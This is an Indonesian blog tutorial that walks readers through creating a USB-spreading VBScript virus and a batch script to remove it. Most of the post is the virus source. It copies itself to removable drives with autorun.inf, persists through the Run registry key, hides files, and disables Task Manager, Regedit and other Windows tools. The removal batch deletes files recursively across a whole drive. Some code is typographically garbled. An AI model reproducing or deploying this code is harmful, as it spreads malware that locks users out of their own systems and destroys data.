Anda muak terkena virus, sama! saya juga! hehe..
Tips kali ini akan membahas pembuatan sebuah virus sederhana yang lengkap dengan pencegahannya. Pada tips kali ini, aplikasi yang digunakan tidak perlu menggunakan software canggih.. cukup dengan menggunakan aplikasi text editor sederhana tapi mumpuni (dalam hal ini, penulis menggunakan aplikasi Notepad bawaan Windows).. he..
Untuk virus, penulis menggunakan contoh coding sederhana sebuah virus lalu penulis lanjut dengan membahas penghapusan virus tersebut melalui command prompt. Semua coding pada tips ini berhasil dibuat melalui aplikasi text editor (notepad) dan bekerja pada Windows XP SP2. Baik coding virus dan coding penghapusan, berjalan dengan sukses tanpa ada aral melintang. Untuk mengembalikan fungsi Windows yang dimatikan oleh coding virus, silahkan gunakan aplikasi utilitas seperti WinBoost atau WinXP Manager (atau keduanya) maupun aplikasi utilitas lainnya karena terlalu banyak manipulasi registry yang dilakukan oleh coding virus ini.. penulis sudah sangat mengantuk untuk membahas pengembalian fitur Windows.. hehe.. mungkin akan dibahas di lain kesempatan.
Penulis dan sumber-sumber penulis tidak bertanggung jawab dan/atau tidak dapat dimintakan pertanggung jawaban atas kerusakan yang timbul sebagai akibat dari penerapan tips ini. Resiko menerapkan tips ini adalah tanggungan pribadi!!
1. Berikut adalah contoh coding dari virus Rangga-Zay yang coding-nya saya temukan pada sebuah blog. Copy-Paste coding berikut lalu ubah baris yang dicetak tebal atau cetak miring:
‘//–Awal dari coding, Memaksa Windows Untuk Mengabaikan Pesan Error Lalu Lanjut Mengeksekusi Baris Perintah Selanjutnya–//
on error resume next
’//–Dim Kata Kunci Berikut–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,namavirus ,nt,check,sd
‘//–Membuat Sebuah File Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe namavirus.ext”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Membuat Sebuah File Induk Virus Pada Folder Windows (contoh: C:WINDOWS)-//
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “batch- namavirus.ext “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “batch- namavirus.ext”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “batch- namavirus.ext “)
tf.attributes = 39
‘//–Membuat File Autorun Yang Akan Dieksekusi Secara Otomatis–//
‘Menggandakan diri apabila tipe drive adalah 1 dan 2 (removable) termasuk disket
for each flashdrive in fs.drives
‘//–Melakukan Pemeriksaan Tipe Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
‘//–Perintah Untuk Menyebarkan File Virus Ke Drive Lain Dengan Tipe Drive 1, 2, Atau Dengan Path A:–//
set tf=fs.getfile(flashdrive.path &”namavirus.ext “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”namavirus.ext “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”namavirus.ext “)
tf.attributes = 39
‘//–Memanggil File Autorun Setup Information Untuk Di Masukkan Ke Dalam File Autorun–//
set tf =fs.getfile(flashdrive.path &”autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set namavirus = createobject(”WScript.Shell”)
‘//–Menambahkan Pesan Pada Title Bar Internet Explorer–//
namavirus.regwrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title”,” Masukkan pesan anda disini “
‘//–Membuat File Dengan Attribut Hidden Tidak Ditampilkan Melalui Windows Explorer–//
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentV ersionPoliciesExplorerAdvancedHidden”, “0?, “REG_DWORD”
‘//–Menghilangkan Menu Find, Folder Options, Run, dan Mematikan Regedit serta Task Manager–//
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentV ersionPoliciesExplorerNoFind”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentV ersionPoliciesExplorerNoFolderOptions”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentV ersionPoliciesExplorerNoRun”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentV ersionPoliciesSystemDisableRegistryTools”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentV ersionPoliciesSystemDisableTaskMgr”, “1?, “REG_DWORD”
‘//–Mematikan Fungsi Klik Kanan–//
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentV ersionPoliciesExplorerNoViewContextMenu”, “1?, “REG_DWORD”
‘//–Memunculkan Pesan Setiap Windows Startup–//
namavirus.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionWinlogonLegalNoticeCaption”, “Masukkan pesan anda disini.”
‘//–Membuat Windows Untuk Selalu Mengeksekusi Virus Pada Saat Startup–//
namavirus.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunSystemdir”, windowpath & “batch- namavirus.ext “
‘//–Mengubah Registered Owner Dan Organization–//
namavirus.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization”, “Masukkan Teks Disini”
namavirus.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner”,”Masukkan Teks Disini”
‘//–Melakukan Perulangan Fungsi Sleep–//
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari coding
2. Simpan dengan nama file bebas tapi ekstensinya harus ".VBS"; agar bisa terbaca dan tereksekusi oleh Windows Scripting Host. Caranya FileSave As.... lalu pada bagian "Save as type" pilih “All Files (*.*)" dan masukkan ekstensi file (.vbs)
3. Klik [Save]
Sekarang, kita akan membuat penghapusan virus tersebut:
1. Buka aplikasi text editor (Notepad, Wordpad, dll..)
2. Copy-Paste coding berikut pada text editor anda
echo Anda yakin mau mengeksekusi penghapusan?
PAUSE
del /s /f C:*.vbs
echo Penghapusan tahap pertama selesai, penghapusan tahap kedua akan dimulai...
PAUSE
del /f /q C:*.vbs
echo Penghapusan selesai. Silahkan restart komputer anda.
PAUSE
EXIT
3. Simpan file tersebut dengan nama file bebas tapi ekstensinya harus ".bat"
4. Jalankan file tersebut dan tunggu hingga selesai
5. Restart komputer
O iya, path "C:" bisa diganti dengan path menuju drive apa saja (A-Z) serta ekstensi file bisa diganti sesuai dengan ekstensi virus. Hati-hati ketika mengubah ekstensi penghapusan menjadi ".exe" karena semua file aplikasi pada drive tersebut akan terhapus tanpa kecuali!
0 komentar:
Posting Komentar